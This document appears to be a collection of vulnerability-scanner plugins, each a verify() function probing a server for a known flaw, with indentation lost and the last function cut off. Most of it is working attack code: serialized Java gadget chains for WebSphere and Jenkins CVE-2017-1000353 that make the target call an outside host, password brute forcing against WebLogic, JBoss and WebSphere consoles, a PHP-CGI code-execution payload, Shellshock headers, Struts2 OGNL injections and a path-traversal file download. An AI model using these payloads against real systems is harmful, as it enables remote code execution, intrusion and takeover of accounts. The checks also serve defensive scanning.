def verify(protocol, ip, port):
url = protocol + '://' + ip + ':' + str(port)
host = ip + ':' + str(port)
print('testing if websphere java unserialized vul')
http = httpparse()
try:
socket.setdefaulttimeout(3)
post_header = {
"Content-Type": "text/xml; charset=utf-8",
"SOAPAction": "\"urn:AdminService\""
}
post_data = (b"""<?xml version='1.0' encoding='UTF-8'?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Header xmlns:ns0="admin" ns0:WASRemoteRuntimeVersion="8.5.5.1" ns0:JMXMessageVersion="1.2.0" ns0:SecurityEnabled="true" ns0:JMXVersion="1.2.0">
<LoginMethod>BasicAuth</LoginMethod>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:getAttribute xmlns:ns1="urn:AdminService" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<objectname xsi:type="ns1:javax.management.ObjectName">%s</objectname>
<attribute xsi:type="xsd:string">ringBufferSize</attribute>
</ns1:getAttribute>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
""")
dnsserver = get_ver_ip(ip)
random_num = random_str(6 + 15 - len(dnsserver))
payload = "aced00057372003273756e2e7265666c6563742e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c6173733b7870737d00000001000d6a6176612e7574696c2e4d6170787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b78707672000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00154c0004686f737471007e00154c000870726f746f636f6c71007e00154c000372656671007e001578707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d6571007e00155b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c020000787000000001757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb342020000787074000e676574436f6e7374727563746f727571007e001d000000017671007e001d7371007e00177571007e001b00000001757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b47020000787000000001740026687474703a2f2f3235352e3235352e3235352e3235353a383038382f6164642f72616e646f6d74000b6e6577496e7374616e63657571007e001d000000017671007e001b7371007e00177571007e001b0000000074000a6f70656e53747265616d7571007e001d000000007371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e0037"
b = 'http://' + dnsserver + ':8088/add/' + random_num
b = bytes(b, 'utf-8')
payload = h2bin(payload)
payload = payload.replace(b'http://255.255.255.255:8088/add/random', b)
#payload = codecs.decode(payload, 'hex').replace('http://255.255.255.255:8088/add/random', ('http://%s:8088/add/%s' % (dnsserver, random_num)).encode())
post_data = post_data % base64.b64encode(payload)
if protocol == 'https':
req = requests.post(url=url + '/',
data=post_data,
headers=post_header,
verify=False,
timeout=5)
else:
req = requests.post(url=url + '/',
data=post_data,
headers=post_header,
timeout=5)
time.sleep(5)
req = requests.get("http://%s:8088/check/%s" % (dnsserver, random_num),
verify=False,
timeout=5)
if 'YES' in req.text:
msg = 'There is Websphere-Java_Unserialized on url :' + url + ' .'
number = 'v56'
return True, url, number, msg
else:
msg = 'There is no Websphere-Java_Unserialized'
number = 'v0'
return False, url, number, msg
except Exception as e:
msg = str(e)
number = 'v0'
return False, url, number, msg
def verify(protocol,ip,port):
url = protocol+'://'+ip+':'+str(port)
print('testing if weblogic-Console')
http = httpparse()
passdictarr = getpassdict()
psw = passdictarr.get_pass_dict()
try:
tm = http.httpreq('GET', protocol, ip, port, '/console/login/LoginForm.jsp')
if b'j_password' in tm[2] and tm[0] == 200:
for pass_ in psw:
data = 'j_username=weblogic&j_password='******'&j_character_encoding=UTF-8'
data = data.encode(encoding="utf-8")
target_url = url + '/console/j_security_check'
tm = http.httpreq('POST', protocol, ip, port, '/console/j_security_check',data=data)
if re.search(b'console</a>', tm[2],re.I):
msg = 'Find'+ 'WebLogic-Console! with pass ' +pass_+ ' in url:' +protocol+'://'+ip+':'+str(port)+'/'
print(msg)
number = 'v12'
return True,url,number,msg
else:
pass
else:
msg = 'not WebLogic-Console'
number = 'v0'
return False,url,number,msg
except Exception as e:
msg = str(e)
number = 'v0'
return False,url,number,msg
msg = 'There is no WebLogic-Console weak pass vul'
number = 'v0'
return False,url,number,msg
def protocolset(ip, port):
http = httpparse()
ip = protocoparse.judegIp(ip)
path = ''
port = str(port)
try:
tm = http.httptest('http', '%s' % ip, port, path)
if tm and (tm != None) and (tm[0] != 504) and (tm[0] != 400) and (
tm[0] != 502) and (str(tm[2]) != []):
protocol = 'http'
rip = ip
port = str(port)
return protocol, rip, port
else:
tms = http.httptest('https', '%s' % ip, port, path)
if tms and (tms != None) and (tms[0] != 504) and (tms[0] !=
502):
protocol = 'https'
rip = ip
port = str(port)
return protocol, rip, port
else:
if tm and (tm != None) and tm[0] == 400:
protocol = 'http'
rip = ip
port = str(port)
return protocol, rip, port
else:
protocol = ''
rip = ip
port = str(port)
return protocol, rip, port
except Exception as e:
print(e)
def verify(protocol,ip,port):
oldurl = protocol+'://'+ip+':'+str(port)
print('testing if php cgi remote code exec vul')
url_list = test_url(protocol,ip,port,timeout=5)
payload = '?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E'
evalcode = '''<?php echo 'Content-type: text/html\n\n';echo 'Here_is_apache_php_remote_code_exec';exit(1);?>'''
fake_header = {
'User-Agent': 'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25'}
data = 1
try:
for url in url_list:
if 'cgi' in url:
try:
http = httpparse()
tm = http.httpreq('POST', protocol, ip, port, url+payload,data=evalcode,header=fake_header)
res_html = str(tm[2])
except Exception as e:
msg = str(e)
print(msg)
pass
if 'Here_is_apache_php_remote_code_exec' in res_html:
msg = 'There is php cgi rce vul on ' + oldurl+url+payload + ' .'
number = 'v91'
return True, url, number, msg
except Exception as e:
msg = str(e)
pass
msg = 'There is no php cgi rce vul'
number = 'v0'
return False,oldurl,number,msg
def verify(protocol, ip, port):
url = protocol + '://' + ip + ':' + str(port)
print('testing if v2 arbitrary file download vul')
http = httpparse()
try:
path = '/Conf/jsp/common/downloadAction.do?path=../management/webapps/root/index.jsp'
tm = http.httpreq('GET', protocol, ip, port, path)
if tm and (tm != None) and tm[0] == 200 and ('index.jsp' in str(
tm[2])):
try:
path = '/Confspursah/jsp/common/downloadAction.do'
tmn = http.httpreq('GET', protocol, ip, port, path)
if tmn and (tmn != None) and tmn[0] == 404:
msg = 'There is v2 arbitrary file download vul on url: ' + url + ' .'
number = 'v27'
print(msg)
return True, url, number, msg
else:
msg = 'There is no v2 arbitrary file download vul on ' + url + ' .'
number = 'v0'
return False, url, number, msg
except Exception as e:
msg = str(e)
number = 'v0'
return False, url, number, msg
else:
msg = 'There is no v2 arbitrary file download vul'
number = 'v0'
return False, url, number, msg
except Exception as e:
msg = str(e)
number = 'v0'
return False, url, number, msg
def verify(protocol,ip,port):
url = protocol+'://'+ip+':'+str(port)
print('testing if ecology vul')
http = httpparse()
try:
tm = http.httpreq('GET', protocol, ip, port, '/main.jsp')
if tm[0] ==302 and re.search(b'login/Login.jsp',tm[2],re.I):
msg = 'e-cology vul'
number = 'v20'
print(msg)
return True,url,number,msg
elif http.httpreq('GET', protocol, ip, port, '/weaver/weaver.email.FileDownloadLocation2')[0] == 500:
if http.httpreq('GET', protocol, ip, port, '/weaver/weaver.email.FileDownloadLocation')[0] == 200:
msg = 'may have e-cology sql vul'
number = 'v20'
print(msg)
return True,url,number,msg
else:
pass
else:
pass
except Exception as e:
msg = str(e)
number = 'v0'
return False,url,number,msg
msg = 'There is no e-cology'
number = 'v0'
return False,url,number,msg
def verify(protocol, ip, port):
url = protocol + '://' + ip + ':' + str(port)
print('testing if JBOSS-WebConsole')
http = httpparse()
passdictarr = getpassdict()
error_i = 0
psw = passdictarr.get_pass_dict()
try:
tm = http.httpreq('GET', protocol, ip, port, '/web-console/')
if re.search('jboss', str(tm[1]), re.I):
if tm[0] == 200:
msg = 'Found JBOSS-WebConsole! in url:' + url + '/web-console/ with no password'
number = 'v7'
print(msg)
return True, url, number, msg
else:
for pass_ in psw:
try:
login_url = url + '/web-console/'
request = urllib.request.Request(login_url)
auth_str_temp = 'admin' + ':' + pass_
auth_str = base64.b64encode(
auth_str_temp.encode(encoding='utf-8'))
request.add_header('Authorization',
'Basic ' + auth_str.decode())
res = urllib.request.urlopen(request, timeout=5)
res_code = res.code
except urllib.error.HTTPError as e:
res_code = e.code
except urllib.error.URLError as e:
error_i += 1
if error_i >= 3:
msg = 'Therer is no JBOSS-WEBConsole weakpass vul in url:' + login_url + '.'
number = 'v0'
return False, url, number, msg
continue
if int(res_code) == 404 or int(res_code) == 502:
msg = 'Therer is no JBOSS-WEBConsole vul in url:' + login_url + '.'
number = 'v0'
return False, url, number, msg
if int(res_code) == 401 or int(res_code) == 403:
continue
if int(res_code) == 200:
msg = 'Found JBOSS-WEBConsole in url:' + url + '/web-console/HtmlAdaptor with password: '******'.'
print(msg)
number = 'v6'
return True, url, number, msg
else:
pass
msg = 'The url:' + url + 'is not jboss'
number = 'v0'
return False, url, number, msg
except Exception as e:
print(e)
msg = str(e)
number = 'v0'
return False, url, number, msg
msg = 'There is no JBOSS-WEBConsole weakpass vul on url'
number = 'v0'
return False, url, number, msg
def verify(protocol, ip, port):
url = protocol + '://' + ip + ':' + str(port)
print('testing if iis shortname vul')
http = httpparse()
try:
path = '/*~1****/a.aspx'
tm = http.httpreq('GET', protocol, ip, port, path)
print(tm[0])
if tm and (tm != None) and tm[0] == 404:
try:
path = '/spurs*~1****/a.aspx'
tmn = http.httpreq('GET', protocol, ip, port, path)
print(tmn[0])
if tmn and (tmn != None) and tmn[0] == 400:
msg = 'There is iis shortname vul on url: ' + url + ' .'
number = 'v15'
print(msg)
return True, url, number, msg
else:
msg = 'There is no iis shortname vul on ' + url + ' .'
number = 'v0'
return False, url, number, msg
except Exception as e:
msg = str(e)
number = 'v0'
return False, url, number, msg
else:
msg = 'There is no iis shortname vul on ' + url + ' .'
number = 'v0'
return False, url, number, msg
except Exception as e:
msg = str(e)
number = 'v0'
return False, url, number, msg
def verify(protocol, ip, port):
path = '/ibm/console/logon.jsp'
url = protocol + '://' + ip + ':' + str(port) + path
print('testing if websphere Console')
http = httpparse()
passdictarr = getpassdict()
ps = passdictarr.get_pass_dict()
ps.append('websphere')
try:
tm = http.httpreq('GET', protocol, ip, port, path)
if re.search('WebSphere', str(tm[2]), re.I):
for psw in ps:
data = 'j_username=admin&j_password='******'&action=%E7%99%BB%E5%BD%95'
npath = '/ibm/console/j_security_check'
try:
data = data.encode('utf-8')
tm = http.httpreq('POST',
protocol,
ip,
port,
path=npath,
data=data)
for item in tm[1]:
if item[0] == 'Content-Type':
res = item[1]
if 'logonError' in res:
pass
else:
nspath = protocol + '://' + ip + ':' + str(
port) + '/ibm/console/'
if nspath == res:
msg = 'Find' + 'Websphere-Console! with pass ' + psw + ' in url:' + protocol + '://' + ip + ':' + str(
port) + npath
print(msg)
number = 'v13'
return True, url, number, msg
else:
pass
else:
pass
else:
pass
except Exception as e:
pass
else:
msg = 'cannot log on websphere console'
number = 'v0'
return False, url, number, msg
else:
msg = 'it is not websphere console'
number = 'v0'
return False, url, number, msg
except Exception as e:
msg = str(e)
number = 'v0'
return False, url, number, msg
def verify(protocol, ip, port):
url = protocol + '://' + ip + ':' + str(port)
print('testing if jenkins cve-2017-1000353 vul')
try:
session = str(uuid.uuid4())
socket.setdefaulttimeout(5)
dnsserver = get_ver_ip(ip)
ramdmum = random_str(6 + 15 - len(dnsserver))
URL = str(url + '/cli')
t = threading.Thread(target=download, args=(URL, session))
t.start()
time.sleep(1)
http = httpparse()
headers = {
'Content-type': 'application/octet-stream',
'Accept-Encoding': 'None',
'Transfer-Encoding': 'chunked',
'Session': session,
'Cache-Control': 'no-cache',
'Content-type': 'application/octet-stream',
'Side': 'upload'
}
payload = '0d0a37370d0a3c3d3d3d5b4a454e4b494e532052454d4f54494e472043415041434954595d3d3d3d3e724f304142584e794142706f6457527a62323475636d567462335270626d63755132467759574a7062476c3065514141414141414141414241674142536741456257467a6133687741414141414141414148343d0d0a340d0a000000000d0a3961650d0aaced00057372002f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e5265666572656e63654d61701594ca03984908d7030000787077110000000000000001003f40000000000010737200286a6176612e7574696c2e636f6e63757272656e742e436f70794f6e577269746541727261795365744bbdd092901569d70200014c0002616c74002b4c6a6176612f7574696c2f636f6e63757272656e742f436f70794f6e577269746541727261794c6973743b7870737200296a6176612e7574696c2e636f6e63757272656e742e436f70794f6e577269746541727261794c697374785d9fd546ab90c303000078707704000000027372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c697374536574dd985079bdcff15b0200014c00016d74002d4c6a6176612f7574696c2f636f6e63757272656e742f436f6e63757272656e744e6176696761626c654d61703b78707372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c6973744d6170884675ae061146a70300014c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870707372001a6a6176612e73656375726974792e5369676e65644f626a65637409ffbd682a3cd5ff0200035b0007636f6e74656e747400025b425b00097369676e617475726571007e000e4c000c746865616c676f726974686d7400124c6a6176612f6c616e672f537472696e673b7870757200025b42acf317f8060854e002000078700000054caced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e000378707672000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00124c0004686f737471007e00124c000870726f746f636f6c71007e00124c000372656671007e001278707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d6571007e00125b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c020000787000000001757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb342020000787074000e676574436f6e7374727563746f727571007e001a000000017671007e001a7371007e00147571007e001800000001757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b47020000787000000001740026687474703a2f2f3235352e3235352e3235352e3235353a383038382f6164642f72616e646f6d74000b6e6577496e7374616e63657571007e001a000000017671007e00187371007e00147571007e00180000000074000a6f70656e53747265616d7571007e001a000000007371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878787571007e00110000002e302c02140a665ea0697942e464f2eb42fc2ee4cffe6bda1002142690cdb27f41817c332fdea1526b801b779d321f740003445341737200116a6176612e6c616e672e426f6f6c65616ecd207280d59cfaee0200015a000576616c75657870017078737200316f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e4c6973744f726465726564536574fcd39ef6fa1ced530200014c00087365744f726465727400104c6a6176612f7574696c2f4c6973743b787200436f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e416273747261637453657269616c697a61626c655365744465636f7261746f72110ff46b96170e1b0300007870737200156e65742e73662e6a736f6e2e4a534f4e41727261795d01546f5c2872d20200025a000e657870616e64456c656d656e74734c0008656c656d656e747371007e0018787200186e65742e73662e6a736f6e2e41627374726163744a534f4ee88a13f4f69b3f82020000787000737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000017704000000017400076a656e6b696e7378787371007e001e00000000770400000000787871007e00207371007e00027371007e000577040000000271007e001a71007e00097871007e002070780d0a300d0a0d0a'
a = 'http://255.255.255.255:8088/add/random'
a = str2hex(a)
b = 'http://%s:8088/add/%s' % (dnsserver, ramdmum)
b = str2hex(b)
payload = payload.replace(a, b)
payload = h2bin(payload)
#payload = payload.replace('http://255.255.255.255:8088/add/random', 'http://' + dnsserver +':8088/add/' + ramdmum)
#req = urllib.request.Request(url=URL, headers=headers, data=payload)
#page = urllib.request.urlopen(req,timeout=3).read()
#urllib.request.urlopen(urllib.request.Request(URL, headers=headers, data=payload))
time.sleep(3)
#req = urllib.request.Request("http://%s:8088/check/%s" % (dnsserver, ramdmum));
#reqopen = urllib.request.urlopen(req)
check_result = requests.get(url="http://%s:8088/check/%s" %
(dnsserver, ramdmum),
timeout=3)
if "YES" in check_result.text:
msg = 'There is jenkisn cve-2017-1000353 vul on ' + url + ' .'
print(msg)
number = 'v43'
return True, url, number, msg
else:
pass
except Exception as e:
msg = str(e)
print(msg)
number = 'v0'
return False, url, number, msg
msg = 'There is no jenkins cve-2017-1000353 vul'
number = 'v0'
return False, url, number, msg
def test_url(protocol,domain, port,timeout):
url_list = []
http = httpparse()
vul_url = ['/cgi-bin/php', '/cgi-bin/php5', '/cgi-bin/php-cgi', '/cgi-bin/php.cgi']
for url in vul_url:
try:
tm = http.httpreq('GET', protocol, domain, port, url)
if tm[0] == 200:
url_list.append(url)
else:
pass
except Exception as e:
msg = str(e)
pass
return list(set(url_list))
def verify(protocol, ip, port):
url = protocol + '://' + ip + ':' + str(port)
print('testing if jenkins unauth vul')
http = httpparse()
try:
path = ''
tm = http.httpreq('GET', protocol, ip, port, path)
if tm and (tm != None) and tm[0] == 200 and b'/asynchPeople/' in tm[2]:
path = path + '/script'
print(path)
newtm = http.httpreq('GET', protocol, ip, port, path)
if newtm and (newtm !=
None) and newtm[0] == 200 and b'println' in newtm[
2] and b'submit' in newtm[2]:
msg = 'There is a jenkins unauth vul which can result in get shell on %s' % url
print(msg)
number = 'v36'
return True, url, number, msg
else:
pass
else:
pass
url = protocol + '://' + ip + ':' + str(port)
path = '/jenkins/'
tm1 = http.httpreq('GET', protocol, ip, port, path)
if tm1 and (tm1 != None
) and tm1[0] == 200 and b'Dashboard [Jenkins]' in tm1[2]:
path = path + '/script'
newtm1 = http.httpreq('GET', protocol, ip, port, path)
if newtm1 and (newtm1 !=
None) and newtm1[0] == 200 and b'println' in newtm1[
2] and b'submit' in newtm1[2]:
msg = 'There is a jenkins unauth vul which can result in get shell on %s' % url
print(msg)
number = 'v36'
return True, url, number, msg
else:
pass
else:
pass
except Exception as e:
print(str(e))
msg = str(e)
number = 'v0'
return False, url, number, msg
msg = 'There is no jenkins unauth vul'
number = 'v0'
return False, url, number, msg
def verify(protocol, ip, port):
url = protocol + '://' + ip + ':' + str(port)
print('testing if hudson unauth vul')
http = httpparse()
try:
path = ''
tm = http.httpreq('GET', protocol, ip, port, path)
if tm and (tm !=
None) and tm[0] == 200 and b'Dashboard [Hudson]' in tm[2]:
path = path + '/script'
newtm = http.httpreq('GET', protocol, ip, port, path)
if newtm and (newtm !=
None) and newtm[0] == 200 and b'println' in newtm[
2] and b'submit' in newtm[2]:
msg = 'There is a hudson unauth vul which can result in get shell on %s' % url
print(msg)
number = 'v35'
return True, url, number, msg
else:
pass
else:
pass
url = protocol + '://' + ip + ':' + str(port)
path = '/hudson/'
tm1 = http.httpreq('GET', protocol, ip, port, path)
if tm1 and (tm1 != None
) and tm1[0] == 200 and b'Dashboard [Hudson]' in tm1[2]:
path = path + '/script'
newtm1 = http.httpreq('GET', protocol, ip, port, path)
if newtm1 and (newtm1 !=
None) and newtm1[0] == 200 and b'println' in newtm1[
2] and b'submit' in newtm1[2]:
msg = 'There is a hudson unauth vul which can result in get shell on %s' % url
print(msg)
number = 'v35'
return True, url, number, msg
else:
msg = 'There is no hudson unauth vul on %s' % url
number = 'v0'
return False, url, number, msg
else:
msg = 'There is no hunson unauth vul on %s' % url
number = 'v0'
return False, url, number, msg
except Exception as e:
msg = str(e)
number = 'v0'
return False, url, number, msg
def verify(protocol,ip,port):
payloads = {"S2-005":"('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\[email protected]@EMPTY_SET')(c))&(g)(('\\43req\\[email protected]@getRequest()')(d))&(i2)(('\\43xman\\[email protected]@getResponse()')(d))&(i2)(('\\43xman\\[email protected]@getResponse()')(d))&(i95)(('\\43xman.getWriter().println(1111*2222)')(d))&(i99)(('\\43xman.getWriter().close()')(d))",
"S2-009A":"class.classLoader.jarPath=(#context['xwork.MethodAccessor.denyMethodExecution']= new java.lang.Boolean(false), #_memberAccess['allowStaticMethodAccess']=true,#[email protected]@getRequest(),#[email protected]@getResponse().getWriter(),#outstr.println(1111*2222),#outstr.close())(meh)&z[(class.classLoader.jarPath)('meh')]",
"S2-009B":"class['classLoader'].jarPath=(#context['xwork.MethodAccessor.denyMethodExecution']= new java.lang.Boolean(false), #_memberAccess['allowStaticMethodAccess']=true,#[email protected]@getRequest(),#[email protected]@getResponse().getWriter(),#outstr.println(1111*2222),#outstr.close())(meh)&z[(class['classLoader'].jarPath)('meh')]",
"S2-013":"a=1${(%23_memberAccess['allowStaticMethodAccess']=true,%[email protected]@getRequest(),%[email protected]@getResponse().getWriter(),%23k8out.println(1111*2222),%23k8out.close())}",
"S2-016A":"redirect:${1111*2222}",
"S2-016B":"redirectAction:${1111*2222}",
"S2-016C":"action:${1111*2222}",
"S2-019A":"debug=command&expression=1111*2222",
"S2-019B":"debug=command&expression=%23_memberAccess['allowStaticMethodAccess']=true,@java.lang.Runtime@getRuntime()",
"S2-020":"Class.ClassLoader.parent=GENXOR",
"S2-021":"Class['ClassLoader'].resources=GENXOR",
"S2-022A":"Class.ClassLoader.parent=GENXOR",
"S2-022B":"Class['ClassLoader'].resources=GENXOR",
}
success = []
payload = {}
url = protocol+'://'+ip+':'+str(port)
for id in payloads:
if not re.search(list(filter(str.isdigit,id)),str(success)):
http = httpparse()
tm = http.httpreq("POST",protocol,ip,str(port),data=payloads[id])
if re.search('S2-016', id):
if re.search('2468642', str(tm[1][1])):
success.append(list(filter(str.isdigit,id)))
payload[id] = tm[0]
elif id == "S2-020" or id == "S2-021":
if tm[1][0] == 404 and http.httpreq('POST',protocol,ip,str(port), data='')[1][0] != 404:
success.append(list(filter(str.isdigit,id)))
payload[id] = tm[0]
elif re.search('S2-022', id):
if http.httpreq('GET', protocol,ip,port, header={"Cookie":payloads[id]})[1][0] == 404 and http.httpreq('get',protocol,ip,port)[1][0] != 404:
success.append(list(filter(str.isdigit,id)))
payload[id] = tm[0]
else:
if re.search('2468642|java\.lang\.Runtime@', tm[1][2], re.I):
success.append(list(filter(str.isdigit,id)))
payload[id] = tm[0]
for k in list(payload.keys()):
if payload[k] != 404:
msg = 'There is a struts2 vul , payloadid is'+k+'.'
print(msg)
return True,url,msg
else:
pass
else:
msg = 'There is no struts2 vul'
return True,url,msg
def protocolurlset(ip, port):
urls = [
'websphereconsole|/ibm/console/logon.jsp',
'weblogicconsole|/console/login/LoginForm.jsp',
'jbossadmin|/admin-console/index.seam',
'jbossconsole|/jmx-console/', 'jbosspass|/web-console/',
'jboss|/invoker/JMXInvokerServlet'
]
http = httpparse()
ip = protocoparse.judegIp(ip)
port = int(port)
try:
for url in urls:
path = url.split('|')[1]
module = url.split('|')[0]
tm = http.httptest('https', '%s' % ip, port, path)
if tm and (tm != None) and (tm[0] != 404) and (
tm[0] != 504) and (tm[0] != 502):
protocol = 'https'
rip = ip
port = str(port)
npath = path
nmodule = module
return protocol, rip, port, npath, nmodule
else:
domain = 'http://' + ip + ':' + str(port)
tm = http.httptest('http', '%s' % ip, port, path)
if tm and (tm != None) and (tm[0] != 404) and (
tm[0] != 400) and (tm[0] != 504) and (str(tm[2]) !=
[]):
protocol = 'http'
rip = ip
port = str(port)
npath = path
nmodule = module
return protocol, rip, port, npath, nmodule
else:
pass
else:
protocol = ''
rip = ip
port = str(port)
npath = ''
nmodule = ''
return protocol, rip, port, npath, nmodule
except Exception as e:
print(e)
def verify(protocol, ip, port):
oldurl = protocol + '://' + ip + ':' + str(port)
print('testing if shell shock vul')
url_list = test_url(protocol, ip, port, timeout=10)
try:
flag_list = [
'() { :; }; echo; echo X-Bash-Test: hczjhdqtjh',
'env x="() { :;}; echo hczjhdqtjh" bash -c "echo this is a test"',
'() { :;};a="hczjhdqtjh";echo "a: $a"'
]
for url in url_list:
if 'cgi' in url:
for flag in flag_list:
header = {
'cookie': flag,
'User-Agent': flag,
'Referrer': flag
}
try:
http = httpparse()
tm = http.httpreq('GET',
protocol,
ip,
port,
url,
header=header)
res_html = str(tm[2])
res_header = str(tm[1])
except Exception as e:
msg = str(e)
print(msg)
pass
if "hczjhdqtjh" in res_header:
msg = 'There is shell shock vul on ' + oldurl + url + ' .'
number = 'v45'
return True, url, number, msg
except Exception as e:
msg = str(e)
print(msg)
pass
msg = 'There is no shell shock vul'
number = 'v0'
return False, oldurl, number, msg
def verify(protocol, ip, port):
url = protocol + '://' + ip + ':' + str(port)
print('testing if CVE-2017-12149 JBOSS AS 6.x unserialized vul')
http = httpparse()
tag = 'JBoss Web'
try:
tm = http.httpreq('GET', protocol, ip, port, '/invoker/readonly')
if (re.search(tag, str(tm[2]), re.I)) and tm[0] == 500:
msg = 'There is CVE-2017-12149 JBOSS AS 6.x unserialized vul on url: ' + url + ' .'
number = 'v62'
return True, url, number, msg
else:
pass
except Exception as e:
msg = str(e)
number = 'v0'
return False, url, number, msg
msg = 'There is no CVE-2017-12149 JBOSS AS 6.x unserialized vul'
number = 'v0'
return False, url, number, msg
def verify(protocol, ip, port):
url = protocol + '://' + ip + ':' + str(port)
